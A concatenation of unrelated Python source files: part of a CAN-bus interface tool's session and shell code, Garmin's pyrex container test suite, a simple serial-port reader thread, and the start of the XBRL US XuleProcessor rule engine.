    self.comments = me.get('comments')
    # NOTE(review): sessions saved by a plain CanInterface lack the *_iso
    # keys, leaving these as None rather than empty containers -- confirm
    # downstream code tolerates that
    self.bookmarks_iso = me.get('bookmarks_iso')
    self.bookmark_info_iso = me.get('bookmark_info_iso')
def saveSession(self):
    '''
    Save the current analysis session to a python dictionary object.
    What you do with it from there is your own business.
    This function is called by saveSessionToFile() to get the data
    to save to the file.
    '''
    return {
        'messages': self._messages,
        'bookmarks': self.bookmarks,
        'bookmark_info': self.bookmark_info,
        'bookmarks_iso': self.bookmarks_iso,
        'bookmark_info_iso': self.bookmark_info_iso,
        'comments': self.comments,
        'file_version': 1.0,
        'class': self.__class__,
        'config': self._config,
    }
######### administrative, supporting code ##########
# module-global list of interface objects to tear down when the
# interactive session exits
cs = []

def cleanupInteractiveAtExit():
    '''
    atexit hook: explicitly finalize every interface registered in `cs`,
    ignoring any errors raised during teardown.
    '''
    global cs
    for c in cs:
        try:
            c.__del__()
        except Exception:
            # a bare `except:` would also swallow KeyboardInterrupt and
            # SystemExit; best-effort cleanup should only ignore ordinary errors
            pass
def getDeviceFile():
    '''
    Return the first serial port device path that actually exists on
    disk, or None if no candidate is found.

    Cleanup: the original enumerated the ports but never used the
    counter; the enumerate() wrapper has been dropped.
    '''
    import serial.tools.list_ports
    # comports() yields (port, desc, hwid) tuples
    for port, desc, hwid in sorted(serial.tools.list_ports.comports()):
        if os.path.exists(port):
            return port
def interactive(port=None, InterfaceClass=CanInterface, intro='', load_filename=None, can_baud=None):
    '''
    Create a CAN interface (or load a saved session) bound to the global
    `c`, then drop the user into an interactive Python shell.

    Prefers IPython, trying several generations of its API, and falls
    back to the stdlib code.InteractiveConsole when IPython is absent.
    '''
    global c
    import atexit
    c = InterfaceClass(port=port, load_filename=load_filename)
    # make sure the interface is torn down when the shell exits
    atexit.register(cleanupInteractiveAtExit)
    # live sessions need a baud rate; replayed sessions do not
    if load_filename is None:
        if can_baud != None:
            c.setCanBaud(can_baud)
        else:
            c.setCanBaud(CAN_500KBPS)
    gbls = globals()
    lcls = locals()
    try:
        # modern IPython: embed() does everything
        import IPython
        ipsh = IPython.embed(banner1=intro, colors="neutral")
    except ImportError as e:
        try:
            # older IPython: terminal shell API
            from IPython.terminal.interactiveshell import TerminalInteractiveShell
            from IPython.terminal.ipapp import load_default_config
            ipsh = TerminalInteractiveShell(config=load_default_config())
            ipsh.user_global_ns.update(gbls)
            ipsh.user_global_ns.update(lcls)
            ipsh.autocall = 2       # don't require parenthesis around *everything*.  be smart!
            ipsh.mainloop(intro)
        except ImportError as e:
            try:
                # even older IPython: "frontend" package layout
                from IPython.frontend.terminal.interactiveshell import TerminalInteractiveShell
                ipsh = TerminalInteractiveShell()
                ipsh.user_global_ns.update(gbls)
                ipsh.user_global_ns.update(lcls)
                ipsh.autocall = 2       # don't require parenthesis around *everything*.  be smart!
                ipsh.mainloop(intro)
            except ImportError as e:
                # no IPython available at all: plain stdlib console
                print(e)
                shell = code.InteractiveConsole(gbls)
                shell.interact(intro)
|
test.py | #! /usr/bin/env python3
#
# Copyright 2019 Garmin Ltd. or its subsidiaries
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import configparser
import grp
import os
import pwd
import re
import shutil
import subprocess
import sys
import tempfile
import threading
import unittest
import pty
PYREX_ROOT = os.path.join(os.path.dirname(__file__), '..')
sys.path.append(PYREX_ROOT)
import pyrex # NOQA
TEST_PREBUILT_TAG_ENV_VAR = 'TEST_PREBUILT_TAG'

def skipIfPrebuilt(func):
    '''
    Decorator for test methods that only make sense for locally-built
    images: skips the test when TEST_PREBUILT_TAG is set (non-empty).

    Improvement: the wrapper is now decorated with functools.wraps so
    the wrapped test keeps its __name__/__doc__ -- without it, every
    skipped-capable test reported as "wrapper" in unittest output.
    '''
    import functools

    @functools.wraps(func)
    def wrapper(self, *args, **kwargs):
        if os.environ.get(TEST_PREBUILT_TAG_ENV_VAR, ''):
            self.skipTest('Test does not apply to prebuilt images')
        return func(self, *args, **kwargs)
    return wrapper
class PyrexTest(object):
    def setUp(self):
        '''
        Per-test scaffolding. This class is a mixin for unittest.TestCase
        subclasses (it relies on addCleanup/skipTest being present):
        builds a scratch build tree with a pyrex.ini, a sanitized PATH,
        and a per-thread work directory.
        '''
        self.build_dir = os.path.abspath(os.path.join(PYREX_ROOT, 'build'))
        def cleanup_build():
            if os.path.isdir(self.build_dir):
                shutil.rmtree(self.build_dir)
        # remove any leftovers from a previous run before creating fresh dirs
        cleanup_build()
        os.makedirs(self.build_dir)
        self.addCleanup(cleanup_build)
        conf_dir = os.path.join(self.build_dir, 'conf')
        os.makedirs(conf_dir)
        self.pyrex_conf = os.path.join(conf_dir, 'pyrex.ini')
        def cleanup_env():
            os.environ.clear()
            os.environ.update(self.old_environ)
        # OE requires that "python" be python2, not python3
        self.bin_dir = os.path.join(self.build_dir, 'bin')
        self.old_environ = os.environ.copy()
        os.makedirs(self.bin_dir)
        os.symlink('/usr/bin/python2', os.path.join(self.bin_dir, 'python'))
        os.environ['PATH'] = self.bin_dir + ':' + os.environ['PATH']
        os.environ['PYREX_DOCKER_BUILD_QUIET'] = '0'
        self.addCleanup(cleanup_env)
        # per-thread directory so tests can run in parallel without clobbering
        self.thread_dir = os.path.join(self.build_dir, "%d.%d" % (os.getpid(), threading.get_ident()))
        os.makedirs(self.thread_dir)
        # Write out the default test config
        conf = self.get_config()
        conf.write_conf()
def get_config(self, defaults=False):
    '''
    Return the pyrex test configuration as a RawConfigParser subclass
    carrying a write_conf() helper that persists it to self.pyrex_conf.

    Reads the on-disk config unless defaults=True (or none exists yet),
    in which case the shipped default config is parsed instead.
    NOTE: self.test_image is expected to be provided by the concrete
    image-specific subclass.
    '''
    class Config(configparser.RawConfigParser):
        def write_conf(self):
            write_config_helper(self)
    def write_config_helper(conf):
        with open(self.pyrex_conf, 'w') as f:
            conf.write(f)
    config = Config()
    if os.path.exists(self.pyrex_conf) and not defaults:
        config.read(self.pyrex_conf)
    else:
        config.read_string(pyrex.read_default_config(True))
    # Setup the config suitable for testing
    config['config']['dockerimage'] = self.test_image
    prebuilt_tag = os.environ.get(TEST_PREBUILT_TAG_ENV_VAR, '')
    if prebuilt_tag:
        config['config']['pyrextag'] = prebuilt_tag
        config['config']['buildlocal'] = '0'
    else:
        # Always build the latest image locally for testing. Use a tag that
        # isn't present on docker hub so that any attempt to pull it fails
        config['config']['pyrextag'] = 'ci-test'
        config['config']['buildlocal'] = '1'
    return config
def assertSubprocess(self, *args, capture=False, returncode=0, **kwargs):
    '''
    Run a subprocess and assert that it exits with *returncode*.

    With capture=True the combined stdout/stderr is returned as bytes;
    otherwise output is streamed live to sys.stdout and None is returned.
    '''
    if capture:
        try:
            output = subprocess.check_output(*args, stderr=subprocess.STDOUT, **kwargs)
        except subprocess.CalledProcessError as e:
            ret = e.returncode
            output = e.output
        else:
            ret = 0
        # NOTE(review): ' '.join(*args) assumes exactly one positional
        # argument (the argv list) -- confirm no caller passes a bare string
        self.assertEqual(ret, returncode, msg='%s: %s' % (' '.join(*args), output.decode('utf-8')))
        return output
    else:
        with subprocess.Popen(*args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, **kwargs) as proc:
            # stream child output line-by-line until it exits
            while True:
                out = proc.stdout.readline().decode('utf-8')
                if not out and proc.poll() is not None:
                    break
                if out:
                    sys.stdout.write(out)
            ret = proc.poll()
        self.assertEqual(ret, returncode, msg='%s failed' % ' '.join(*args))
        return None
def _write_host_command(self, args, quiet_init=False):
cmd_file = os.path.join(self.thread_dir, 'command')
with open(cmd_file, 'w') as f:
f.write('. ./poky/pyrex-init-build-env ')
if quiet_init:
f.write('> /dev/null 2>&1 ')
f.write('&& ')
f.write(' && '.join(list(args)))
return cmd_file
def _write_container_command(self, args):
cmd_file = os.path.join(self.thread_dir, 'container_command')
with open(cmd_file, 'w') as f:
f.write(' && '.join(args))
return cmd_file
def assertPyrexHostCommand(self, *args, quiet_init=False, **kwargs):
    '''
    Run *args* on the host through the pyrex init script and assert
    on the resulting exit code via assertSubprocess().
    '''
    script = self._write_host_command(args, quiet_init)
    return self.assertSubprocess(['/bin/bash', script], cwd=PYREX_ROOT, **kwargs)
def assertPyrexContainerShellCommand(self, *args, **kwargs):
    '''
    Run *args* inside the pyrex container via pyrex-shell.
    '''
    script = self._write_container_command(args)
    return self.assertPyrexHostCommand('pyrex-shell %s' % script, **kwargs)
def assertPyrexContainerCommand(self, cmd, **kwargs):
    # Run a single command inside the pyrex container via pyrex-run.
    return self.assertPyrexHostCommand('pyrex-run %s' % cmd, **kwargs)
def assertPyrexContainerShellPTY(self, *args, returncode=0, env=None, quiet_init=False):
    '''
    Run *args* in the container through pyrex-shell under a pseudo-tty
    (pty.spawn), asserting on the child's exit status. Returns the
    captured stdout as bytes.
    '''
    container_cmd_file = self._write_container_command(args)
    host_cmd_file = self._write_host_command(['pyrex-shell %s' % container_cmd_file], quiet_init)
    stdout = []
    def master_read(fd):
        # pty master reader: accumulate everything the child writes
        while True:
            data = os.read(fd, 1024)
            if not data:
                return data
            stdout.append(data)
    old_env = None
    try:
        # temporarily swap in the caller-supplied environment wholesale
        if env:
            old_env = os.environ.copy()
            os.environ.clear()
            os.environ.update(env)
        status = pty.spawn(['/bin/bash', host_cmd_file], master_read)
    finally:
        if old_env is not None:
            os.environ.clear()
            os.environ.update(old_env)
    # status is a raw wait(2) status word: decode signal/exit information
    self.assertFalse(os.WIFSIGNALED(status), msg='%s died from a signal: %s' %
                     (' '.join(args), os.WTERMSIG(status)))
    self.assertTrue(os.WIFEXITED(status), msg='%s exited abnormally' % ' '.join(args))
    self.assertEqual(os.WEXITSTATUS(status), returncode, msg='%s failed' % ' '.join(args))
    return b''.join(stdout)
class PyrexImageType_base(PyrexTest):
"""
Base image tests. All images that derive from a -base image should derive
from this class
"""
def test_init(self):
    # Smoke test: the pyrex environment initializes and can run a no-op.
    self.assertPyrexHostCommand('true')
def test_pyrex_shell(self):
    # The shell's exit status must propagate out of the container.
    self.assertPyrexContainerShellCommand('exit 3', returncode=3)
def test_pyrex_run(self):
    # pyrex-run must propagate the command's failure exit code.
    self.assertPyrexContainerCommand('/bin/false', returncode=1)
def test_disable_pyrex(self):
    '''
    With PYREX_DOCKER=0, commands must run directly on the host (same
    cgroups as this process) instead of inside the container.
    '''
    # Capture our cgroups
    with open('/proc/self/cgroup', 'r') as f:
        cgroup = f.read()
    pyrex_cgroup_file = os.path.join(self.thread_dir, 'pyrex_cgroup')
    # Capture cgroups when pyrex is enabled
    self.assertPyrexContainerShellCommand('cat /proc/self/cgroup > %s' % pyrex_cgroup_file)
    with open(pyrex_cgroup_file, 'r') as f:
        pyrex_cgroup = f.read()
    # containerized run must see different cgroups than the host
    self.assertNotEqual(cgroup, pyrex_cgroup)
    env = os.environ.copy()
    env['PYREX_DOCKER'] = '0'
    self.assertPyrexContainerShellCommand('cat /proc/self/cgroup > %s' % pyrex_cgroup_file, env=env)
    with open(pyrex_cgroup_file, 'r') as f:
        pyrex_cgroup = f.read()
    # disabled run must see the host's own cgroups
    self.assertEqual(cgroup, pyrex_cgroup)
def test_quiet_build(self):
    # PYREX_DOCKER_BUILD_QUIET=1 must not break the image build.
    env = os.environ.copy()
    env['PYREX_DOCKER_BUILD_QUIET'] = '1'
    self.assertPyrexHostCommand('true', env=env)
def test_no_docker_build(self):
    '''
    With PYREX_DOCKER=0 at init time the environment must work without
    docker, and must refuse any later attempt to re-enable it.
    '''
    # Prevent docker from working
    os.symlink('/bin/false', os.path.join(self.bin_dir, 'docker'))
    # Docker will fail if invoked here
    env = os.environ.copy()
    env['PYREX_DOCKER'] = '0'
    self.assertPyrexHostCommand('true', env=env)
    # Verify that pyrex won't allow you to try and use docker later
    output = self.assertPyrexHostCommand('PYREX_DOCKER=1 bitbake', returncode=1,
                                         capture=True, env=env).decode('utf-8')
    self.assertIn('Docker was not enabled when the environment was setup', output)
def test_bad_docker(self):
    '''
    A broken docker binary must surface the installation-instructions
    error rather than failing cryptically.
    '''
    # Prevent docker from working
    os.symlink('/bin/false', os.path.join(self.bin_dir, 'docker'))
    # Verify that attempting to run build pyrex without docker shows the
    # installation instructions
    output = self.assertPyrexHostCommand('true', returncode=1, capture=True).decode('utf-8')
    self.assertIn('Unable to run', output)
def test_ownership(self):
    '''
    Files created inside the container must carry the same UID/GID and
    user/group names as the user running the tests outside.
    '''
    # Test that files created in docker are the same UID/GID as the user
    # running outside
    test_file = os.path.join(self.thread_dir, 'ownertest')
    if os.path.exists(test_file):
        os.unlink(test_file)
    self.assertPyrexContainerShellCommand('echo "$(id -un):$(id -gn)" > %s' % test_file)
    s = os.stat(test_file)
    self.assertEqual(s.st_uid, os.getuid())
    self.assertEqual(s.st_gid, os.getgid())
    with open(test_file, 'r') as f:
        (username, groupname) = f.read().rstrip().split(':')
    self.assertEqual(username, pwd.getpwuid(os.getuid()).pw_name)
    self.assertEqual(groupname, grp.getgrgid(os.getgid()).gr_name)
def test_owner_env(self):
    '''
    The uid/gid/username/groupname overrides configured under [run] must
    be visible inside the container (ids, names and $USER/$GROUP).
    '''
    # This test is primarily designed to ensure that everything is passed
    # correctly through 'pyrex run'
    conf = self.get_config()
    # Note: These config variables are intended for testing use only
    conf['run']['uid'] = '1337'
    conf['run']['gid'] = '7331'
    conf['run']['username'] = 'theuser'
    conf['run']['groupname'] = 'thegroup'
    conf['run']['initcommand'] = ''
    conf.write_conf()
    # Make a fifo that the container can write into. We can't just write a
    # file because it won't be owned by running user and thus can't be
    # cleaned up
    old_umask = os.umask(0)
    self.addCleanup(os.umask, old_umask)
    fifo = os.path.join(self.thread_dir, 'fifo')
    os.mkfifo(fifo)
    self.addCleanup(os.remove, fifo)
    os.umask(old_umask)
    output = []
    def read_fifo():
        # reader thread: fifo open blocks until the container-side writer opens it
        nonlocal output
        with open(fifo, 'r') as f:
            output = f.readline().rstrip().split(':')
    thread = threading.Thread(target=read_fifo)
    thread.start()
    try:
        self.assertPyrexContainerShellCommand(
            'echo "$(id -u):$(id -g):$(id -un):$(id -gn):$USER:$GROUP" > %s' % fifo)
    finally:
        thread.join()
    self.assertEqual(output[0], '1337')
    self.assertEqual(output[1], '7331')
    self.assertEqual(output[2], 'theuser')
    self.assertEqual(output[3], 'thegroup')
    self.assertEqual(output[4], 'theuser')
    self.assertEqual(output[5], 'thegroup')
def test_duplicate_binds(self):
    # Listing the same bind path twice must not break container startup.
    bind_dir = tempfile.mkdtemp('-pyrex')
    self.addCleanup(shutil.rmtree, bind_dir)

    conf = self.get_config()
    conf['run']['bind'] += ' {0} {0}'.format(bind_dir)
    conf.write_conf()

    self.assertPyrexContainerShellCommand('true')
def test_bad_confversion(self):
    # A config file carrying an unsupported version must be rejected.
    bad_conf = self.get_config()
    bad_conf['config']['confversion'] = '0'
    bad_conf.write_conf()
    self.assertPyrexHostCommand('true', returncode=1)
def test_conftemplate_ignored(self):
    # A template with a bad version sitting in an alternate location must be
    # ignored while a valid config file is already in place.
    alt_dir = tempfile.mkdtemp('-pyrex')
    self.addCleanup(shutil.rmtree, alt_dir)

    template_path = os.path.join(alt_dir, 'pyrex.ini.sample')
    template = self.get_config(defaults=True)
    template['config']['confversion'] = '0'
    with open(template_path, 'w') as f:
        template.write(f)

    self.assertPyrexHostCommand('true')
def test_conf_upgrade(self):
    # Strip the version from the active config so pyrex must upgrade it.
    conf = self.get_config()
    del conf['config']['confversion']
    conf.write_conf()

    # A template in an alternate location, pointed at via the environment,
    # should be respected during the upgrade.
    alt_dir = tempfile.mkdtemp('-pyrex')
    self.addCleanup(shutil.rmtree, alt_dir)
    template_path = os.path.join(alt_dir, 'pyrex.ini.sample')
    template = self.get_config(defaults=True)
    with open(template_path, 'w') as f:
        template.write(f)

    env = os.environ.copy()
    env['PYREXCONFTEMPLATE'] = template_path
    self.assertPyrexHostCommand('true', env=env)
def test_bad_conf_upgrade(self):
    # The active config has no version, forcing an upgrade attempt...
    conf = self.get_config()
    del conf['config']['confversion']
    conf.write_conf()

    # ...but the alternate template also lacks a confversion, so the
    # upgrade must fail.
    alt_dir = tempfile.mkdtemp('-pyrex')
    self.addCleanup(shutil.rmtree, alt_dir)
    template_path = os.path.join(alt_dir, 'pyrex.ini.sample')
    template = self.get_config(defaults=True)
    del template['config']['confversion']
    with open(template_path, 'w') as f:
        template.write(f)

    env = os.environ.copy()
    env['PYREXCONFTEMPLATE'] = template_path
    self.assertPyrexHostCommand('true', returncode=1, env=env)
def test_force_conf(self):
    # Write a side config file with a distinct marker value...
    forced = self.get_config()
    forced['config']['test'] = 'bar'
    forced_path = os.path.join(self.thread_dir, 'force.ini')
    with open(forced_path, 'w') as f:
        forced.write(f)

    # ...and a different marker in the standard config file.
    conf = self.get_config()
    conf['config']['test'] = 'foo'
    conf.write_conf()

    # Without the override the standard config wins.
    value = self.assertPyrexHostCommand('pyrex-config get config:test', quiet_init=True,
                                        capture=True).decode('utf-8').strip()
    self.assertEqual(value, 'foo')

    # With PYREXCONFFILE set, the forced file wins.
    env = os.environ.copy()
    env['PYREXCONFFILE'] = forced_path
    value = self.assertPyrexHostCommand('pyrex-config get config:test', quiet_init=True,
                                        capture=True, env=env).decode('utf-8').strip()
    self.assertEqual(value, 'bar')
@skipIfPrebuilt
def test_local_build(self):
    # Run any command to build the images locally
    self.assertPyrexHostCommand('true')

    conf = self.get_config()

    # Trying to build with an invalid registry should fail
    conf['config']['registry'] = 'does.not.exist.invalid'
    conf.write_conf()
    self.assertPyrexHostCommand('true', returncode=1)

    # Disable building locally and try again (from the previously cached build)
    conf['config']['buildlocal'] = '0'
    conf.write_conf()
    self.assertPyrexHostCommand('true')
def test_version(self):
    # The advertised version string must match the canonical pattern.
    self.assertRegex(pyrex.VERSION, pyrex.VERSION_REGEX,
                     msg="Version '%s' is invalid" % pyrex.VERSION)
def test_version_tag(self):
    # Determine a tag for HEAD, preferring the one exported by Travis.
    tag = os.environ.get('TRAVIS_TAG') or None
    if not tag:
        try:
            head_tags = subprocess.check_output(
                ['git', '-C', PYREX_ROOT, 'tag', '-l', '--points-at', 'HEAD']
            ).decode('utf-8').splitlines()
            if head_tags:
                tag = head_tags[0]
        except subprocess.CalledProcessError:
            pass

    if not tag:
        self.skipTest('No tag found')

    # The tag must be 'v' + the advertised version, and well-formed.
    self.assertEqual('v%s' % pyrex.VERSION, tag)
    self.assertRegex(tag, pyrex.VERSION_TAG_REGEX, msg="Tag '%s' is invalid" % tag)
@skipIfPrebuilt
def test_tag_overwrite(self):
    # Test that trying to build the image with a release-like tag fails
    # (and doesn't build the image)
    conf = self.get_config()
    conf['config']['pyrextag'] = 'v1.2.3-ci-test'
    conf.write_conf()

    self.assertPyrexHostCommand('true', returncode=1)

    # 'docker images -q' prints nothing when the tag does not exist, which
    # proves the image was never built.
    output = self.assertSubprocess(['docker', 'images', '-q', conf['config']['tag']],
                                   capture=True).decode('utf-8').strip()
    self.assertEqual(output, "", msg="Tagged image found!")
def test_pty(self):
    # Exit codes must propagate correctly when commands run under a PTY.
    self.assertPyrexContainerShellPTY('true')
    self.assertPyrexContainerShellPTY('false', returncode=1)
def test_invalid_term(self):
    # Tests that an invalid terminal is correctly detected.
    bad_term = 'this-is-not-a-valid-term'
    env = os.environ.copy()
    env['TERM'] = bad_term

    # The shell startup should warn about the unrecognized terminal...
    output = self.assertPyrexContainerShellPTY('true', env=env).decode('utf-8').strip()
    self.assertIn('$TERM has an unrecognized value of "%s"' % bad_term, output)

    # ...and the container's terminfo database should not know it either.
    self.assertPyrexContainerShellPTY('/usr/bin/infocmp %s > /dev/null' %
                                      bad_term, env=env, returncode=1, quiet_init=True)
def test_required_terms(self):
    # Terminal types every container image is required to support.
    required = ('dumb', 'vt100', 'xterm', 'xterm-256color')

    env = os.environ.copy()
    for term in required:
        with self.subTest(term=term):
            env['TERM'] = term

            # $TERM must pass through to the container unchanged.
            echoed = self.assertPyrexContainerShellPTY(
                'echo $TERM', env=env, quiet_init=True).decode('utf-8').strip()
            self.assertEqual(echoed, term, msg='Bad $TERM found in container!')

            # The terminfo entry must exist and startup must not warn.
            infocmp_out = self.assertPyrexContainerShellPTY(
                '/usr/bin/infocmp %s > /dev/null' % term, env=env).decode('utf-8').strip()
            self.assertNotIn('$TERM has an unrecognized value', infocmp_out)
def test_tini(self):
    # The tini init process must be present and runnable in the container.
    self.assertPyrexContainerCommand('tini --version')
def test_guest_image(self):
    # This test makes sure that the image being tested is the image we
    # actually expect to be testing

    # Split out the image name, version, and type (e.g. 'ubuntu-16.04-oe')
    (image_name, image_version, _) = self.test_image.split('-')

    # Capture the LSB release information.
    dist_id_str = self.assertPyrexContainerCommand(
        'lsb_release -i', quiet_init=True, capture=True).decode('utf-8').rstrip()
    release_str = self.assertPyrexContainerCommand(
        'lsb_release -r', quiet_init=True, capture=True).decode('utf-8').rstrip()

    self.assertRegex(dist_id_str.lower(), r'^distributor id:\s+' + re.escape(image_name))
    # '(\.|$)' allows an extra point release component (e.g. 16.04 vs 16.04.6).
    self.assertRegex(release_str.lower(), r'^release:\s+' + re.escape(image_version) + r'(\.|$)')
def test_default_ini_image(self):
    # Tests that the default image specified in pyrex.ini is valid
    config = configparser.RawConfigParser()
    config.read_string(pyrex.read_default_config(True))
    self.assertIn(config['config']['dockerimage'], TEST_IMAGES)
def test_envvars(self):
    # Whitelist TEST_ENV so the container should inherit it from the host.
    conf = self.get_config()
    conf['run']['envvars'] += ' TEST_ENV'
    conf.write_conf()

    marker = 'set_by_test.%d' % threading.get_ident()
    env = os.environ.copy()
    env['TEST_ENV'] = marker

    # The whitelisted variable passes through unchanged...
    seen = self.assertPyrexContainerShellCommand(
        'echo $TEST_ENV', env=env, quiet_init=True, capture=True).decode('utf-8').rstrip()
    self.assertEqual(seen, marker)

    # ...while an unlisted one does not.
    seen = self.assertPyrexContainerShellCommand(
        'echo $TEST_ENV2', env=env, quiet_init=True, capture=True).decode('utf-8').rstrip()
    self.assertEqual(seen, '')
def test_custom_startup_script(self):
    conf = self.get_config()
    conf['run']['envvars'] += ' PYREX_TEST_STARTUP_SCRIPT'
    conf.write_conf()

    env = os.environ.copy()

    # NOTE(review): presumably the test startup script in the image exits
    # with the value of PYREX_TEST_STARTUP_SCRIPT and, on success, prints
    # "Startup script test" — confirm against the image's startup scripts.
    env['PYREX_TEST_STARTUP_SCRIPT'] = "3"
    self.assertPyrexContainerShellCommand(
        'echo $PYREX_TEST_STARTUP_SCRIPT', env=env, quiet_init=True, returncode=3)

    env['PYREX_TEST_STARTUP_SCRIPT'] = "0"
    s = self.assertPyrexContainerShellCommand(
        'echo $PYREX_TEST_STARTUP_SCRIPT', env=env, quiet_init=True, capture=True).decode('utf-8').rstrip()
    self.assertEqual(s, "Startup script test\n0")
class PyrexImageType_oe(PyrexImageType_base):
    """
    Tests images designed for building OpenEmbedded
    """

    def test_bitbake_parse(self):
        # bitbake must be able to parse the metadata inside the container.
        self.assertPyrexHostCommand('bitbake -p')

    def test_icecc(self):
        # The icecream distributed-compile client must be installed.
        self.assertPyrexContainerCommand('icecc --version')

    def _check_templateconf(self, make_templateconf):
        """Shared body for the TEMPLATECONF tests.

        Writes a config template that whitelists TEST_ENV, removes the
        normal pyrex config so a new one is pulled from TEMPLATECONF, and
        verifies TEST_ENV reaches the container (which only happens if the
        template was actually used).

        :param make_templateconf: callable mapping the absolute template
            directory to the value to place in $TEMPLATECONF (absolute or
            relative form).
        """
        template_dir = os.path.join(self.thread_dir, 'template')
        os.makedirs(template_dir)
        self.assertTrue(os.path.isabs(template_dir))
        for sample in ('local.conf.sample', 'bblayers.conf.sample'):
            shutil.copyfile(os.path.join(PYREX_ROOT, 'poky/meta-poky/conf', sample),
                            os.path.join(template_dir, sample))

        test_string = 'set_by_test.%d' % threading.get_ident()

        # Write out a config template that passes along the TEST_ENV variable.
        # The variable will only have the correct value in the container if
        # the template is used
        conf = self.get_config()
        conf['run']['envvars'] += ' TEST_ENV'
        with open(os.path.join(template_dir, 'pyrex.ini.sample'), 'w') as f:
            conf.write(f)

        # Delete the normal pyrex conf file so a new one will be pulled from
        # TEMPLATECONF
        os.unlink(self.pyrex_conf)

        env = os.environ.copy()
        env['TEMPLATECONF'] = make_templateconf(template_dir)
        env['TEST_ENV'] = test_string

        s = self.assertPyrexContainerShellCommand(
            'echo $TEST_ENV', env=env, quiet_init=True, capture=True).decode('utf-8').rstrip()
        self.assertEqual(s, test_string)

    def test_templateconf_abs(self):
        # TEMPLATECONF given as an absolute path.
        self._check_templateconf(lambda d: d)

    def test_templateconf_rel(self):
        # TEMPLATECONF given relative to the poky checkout.
        self._check_templateconf(
            lambda d: os.path.relpath(d, os.path.join(PYREX_ROOT, 'poky')))
# Container images exercised by the generated per-image test classes.
# Format: '<distro>-<release>-<image type>', where the type selects the
# PyrexImageType_* base class.
TEST_IMAGES = ('ubuntu-14.04-base', 'ubuntu-16.04-base', 'ubuntu-18.04-base', 'centos-7-base',
               'ubuntu-14.04-oe', 'ubuntu-16.04-oe', 'ubuntu-18.04-oe')
def add_image_tests():
    """Generate one concrete unittest.TestCase subclass per image in
    TEST_IMAGES, derived from the matching PyrexImageType_* class."""
    module = sys.modules[__name__]
    for image in TEST_IMAGES:
        _, _, image_type = image.split('-')
        base_class = getattr(module, 'PyrexImageType_' + image_type)
        class_name = 'PyrexImage_' + re.sub(r'\W', '_', image)
        setattr(module, class_name,
                type(class_name, (base_class, unittest.TestCase), {'test_image': image}))


add_image_tests()

if __name__ == "__main__":
    unittest.main()
|
serial_thread.py | # encoding:UTF-8
import serial # 导入串口包
import time # 导入时间包
import threading
class Config:
    """Serial connection settings."""
    # Serial port device node
    serialPort = '/dev/ttyUSB0'
    # Baud rate
    baudRate = 9600
class Serialthread:
    """Background serial reader/writer.

    Opens the port configured in ``Config``, spawns a daemon thread that
    keeps the most recently received line in ``self.Rev_data``, and offers
    ``send`` for writing GBK-encoded text.
    """

    def __init__(self):
        # timeout=0 makes reads non-blocking.
        self.port = serial.Serial(Config.serialPort, Config.baudRate, timeout=0)
        # Cycle the port so we always start from a known-open state.
        self.port.close()
        if not self.port.isOpen():
            self.port.open()
        self.working = False
        self.iniVariable()  # initialize receive-related state

    def open(self):
        """Open the serial port if it is not already open."""
        if not self.port.isOpen():
            self.port.open()

    def close(self):
        """Close the serial port."""
        self.port.close()

    def iniVariable(self):
        """Reset the receive buffer state."""
        self.Rev_data = " "

    def send(self, data):
        """Write *data* to the port.

        The serial port carries bytes; encode() converts str to GBK bytes.
        """
        self.port.write(data.encode("gbk"))

    def receive(self):
        """Poll the port while ``self.working`` is set, keeping the last
        line read in ``self.Rev_data``."""
        while self.working:
            # A tiny sleep avoids a busy-wait burning CPU.
            time.sleep(0.001)
            if self.port.in_waiting > 0:
                # The port yields bytes; decode() converts GBK bytes to str.
                self.Rev_data = self.port.readline().decode("gbk")

    def start(self):
        """Spawn the daemon reader thread and begin receiving."""
        t = threading.Thread(target=self.receive)
        # A daemon thread is force-terminated when the main thread exits.
        # BUG FIX: Thread.setDaemon() is deprecated since Python 3.10 (and
        # removed in 3.13); assign the attribute instead.
        t.daemon = True
        self.working = True
        t.start()

    def stop(self):
        """Ask the reader thread to exit on its next poll."""
        self.working = False
# Manual smoke test: echo back whatever was last received, once per second.
# The guard ensures this does not run when the module is imported.
if __name__=="__main__":
    s = Serialthread()
    s.start()
    while True:
        time.sleep(1)
        s.send(s.Rev_data)
        print(s.Rev_data)
|
XuleProcessor.py | """XuleProcessor
Xule is a rule processor for XBRL (X)brl r(ULE).
The XuleProcessor module is the main module for processing a rule set against an instance.
DOCSKIP
See https://xbrl.us/dqc-license for license information.
See https://xbrl.us/dqc-patent for patent infringement notice.
Copyright (c) 2017 - 2019 XBRL US, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
$Change: 23074 $
DOCSKIP
"""
from .XuleContext import XuleGlobalContext, XuleRuleContext # XuleContext
from .XuleRunTime import XuleProcessingError, XuleIterationStop, XuleException, XuleBuildTableError, XuleReEvaluate
from .XuleValue import *
from . import XuleConstants as xc
from . import XuleUtility
import itertools as it
from arelle.ModelValue import QName, dayTimeDuration, DateTime, gYear, gMonthDay, gYearMonth, qname
from arelle.ModelInstanceObject import ModelFact
from arelle.ModelRelationshipSet import ModelRelationshipSet
from arelle.ModelDtsObject import ModelConcept
from arelle.ModelObject import ModelObject
import decimal
import datetime
import math
import re
from aniso8601 import parse_duration, parse_datetime, parse_date
import collections
import copy
from threading import Thread
from . import XuleFunctions
from . import XuleProperties
import os
def process_xule(rule_set, model_xbrl, cntlr, options, saved_taxonomies=None):
    """Run xule rules against a filing.

    :param rule_set: An opened rule set
    :type rule_set: XuleRuleSet
    :param model_xbrl: An Arelle model of the instance document
    :type model_xbrl: ModelXbrl
    :param cntlr: An Arelle controller
    :type cntlr: Cntlr
    :param options: The command line options
    :type options: optparse
    :param saved_taxonomies: Taxonomies opened by a previous call, to be reused
    :returns: The taxonomies opened during this run (for reuse on a later call)

    This is the main function to process a Xule ruleset against a filing. This function just sets a few things up.
    The most important item is the processor context. The context saves the state of the processor throughout the
